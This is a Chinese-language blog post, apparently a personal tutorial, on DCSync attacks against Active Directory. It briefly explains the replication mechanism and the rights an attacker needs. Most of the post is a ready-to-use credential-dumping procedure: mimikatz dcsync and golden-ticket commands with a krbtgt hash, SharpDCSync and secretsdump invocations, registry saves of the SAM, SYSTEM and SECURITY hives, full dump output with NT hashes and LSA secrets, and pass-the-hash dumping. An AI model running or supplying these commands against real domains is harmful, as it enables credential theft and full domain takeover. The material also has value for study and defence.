利用dcsync导出域内的几种方法
DCSync 攻击
DCSync它允许攻击者模拟域控(DC)的行为并通过域复制检索密码数据等。获取到数据后,常常用作黄金票据攻击。因为他可以获取到krbtgt hash
原理
在域中不同的dc之间,每15分钟会有一次域数据同步,当辅域想从主域上获取数据时候,就会发送一个GetNCChangges请求,请求的数据,包括需要同步的数据。而DCSync就是利用Directory Replication Service(DRS)服务的GetNCChanges接口向域控发起数据同步请求,进而获取到敏感信息。
- 攻击者发现域控制器的请求复制
- 攻击者使用GetNCChanges请求用户复制
- DC将复制数据返回给请求者,包括hash等
所需要的权限
net localgroup administrators
Administrator
Domain Admins
Enterprise Admins
通常这些管理员都有
- 复制目录更改
- 全部复制目录更改
可以控制域控的计算机账户
有下列三个的权限
DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-In-Filtered-Set,对应GUID为:89e95b76-444d-4c62-991a-0facbeda640c
攻击过程
导出域内所有用户的hash
mimikatz里面默认集成了导出dcsync
lsadump::dcsync /domain:ninitom.cn /user:administrator /all /csv
导出域内指定帐户的hash
lsadump::dcsync /domain:test.com /user:administrator /csv
通过上面就可以对各个用户的hash开始hash传递
同时我们也可以发现获取到了krbtgt账号的hash,我们可以制作黄金票据
kerberos::golden /domain:ninitom.cn /user:test /sid:S-1-5-21-970873778-3225337143-3510277655 /krbtgt:4245d2a4d2bf0fc55153ea91aa2e3537 /ticket:123.kirbi
sharpDCSync.exe
.\SharpDCSync.exe dc1.ninitom.cn ninitom.cn
secretsdump
./当前域
如果其他域可以指定:例如ninitom.cn/administrator
secretsdump.exe ./administrator:Admin123@10.10.10.10
REG 转储文件
reg save HKLM\SYSTEM sys.hivreg save HKLM\SAM sam.hivreg save hklm\security security.hiv
secretsdump 提取
.\secretsdump.exe -sam .\sam.hiv -security .\security.hiv -system .\sys.hiv local
PS C:\Users\Administrator\Desktop\x64\x64> .\secretsdump.exe -sam .\sam.hiv -security .\security.hiv -system .\sys.hiv localCannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"Impacket v? - Copyright 2020 SecureAuth Corporation[*] Target system bootKey: 0x87673af873bf82672d0f317deaae29e8[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d5af43182716fa6dff3c578af8022c1:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.[*] Dumping cached domain logon information (domain/username:hash)[*] Dumping LSA Secrets[*] $MACHINE.ACC$MACHINE.ACC:plain_password_hex:14c818124e40db42ce24abee92605948e7cfb591a76dcbb9debbed53f65cd3891f13416040ecbe5b7177bd03646b74702e18f15bfd2fbd7d55bb8c72121e04f8a0274932f043931ceb33ec2174a153ef416172abe29c293afaff7a50a80ce747ad3f10f152f54d9c79e7f2f6874c327be46d750576cedd2e5640c5b88f7ebaff925d69cf6ffdf1cc68fa03e2c5ca0d12de666e15035266b87ed3cc9421228c7595b7efe95bc76d944754e02c8050b561a10fc080988e2995bc02f532f8d4b86bf54ca353c98b38d8ade4104ef7c5421adaf458e31ecdf02e2fc0f3cca6e5bf1ade4564375a593f5e85a4d6559a67c846$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1e4b1e96170023e3acc5ff4dbc7e9379[*] DPAPI_SYSTEMdpapi_machinekey:0x8caefcac38b5973e9022bdf119ce78f90d0f2a57dpapi_userkey:0x1998c38afcae2976f1f47454956e005bd48dfb2e[*] NL$KM0000 86 B3 88 45 C8 CC DE F0 E1 5E C1 D6 80 B5 D7 92 ...E.....^......0010 82 5E 00 35 9C E8 85 18 92 EB A5 F8 05 28 54 E6 .^.5.........(T.0020 E8 46 B6 03 DC C7 8D F5 3C DD 00 5C 8A 5B 58 D8 .F......<..\.[X.0030 37 EE BF EA 41 0F 37 46 55 66 06 F3 36 7B 12 3B 7...A.7FUf..6{.;NL$KM:86b38845c8ccdef0e15ec1d680b5d792825e00359ce8851892eba5f8052854e6e846b603dcc78df53cdd005c8a5b58d837eebfea410f3746556606f3367b123b[*] Cleaning up...
导出域内所以hash
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>secretsdump.py -just-dc-ntlm ./administrator@10.10.10.10
使用hash导出
.\secretsdump.exe -just-dc-ntlm ./administrator@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d
若有收获,就点个赞吧
0 人点赞
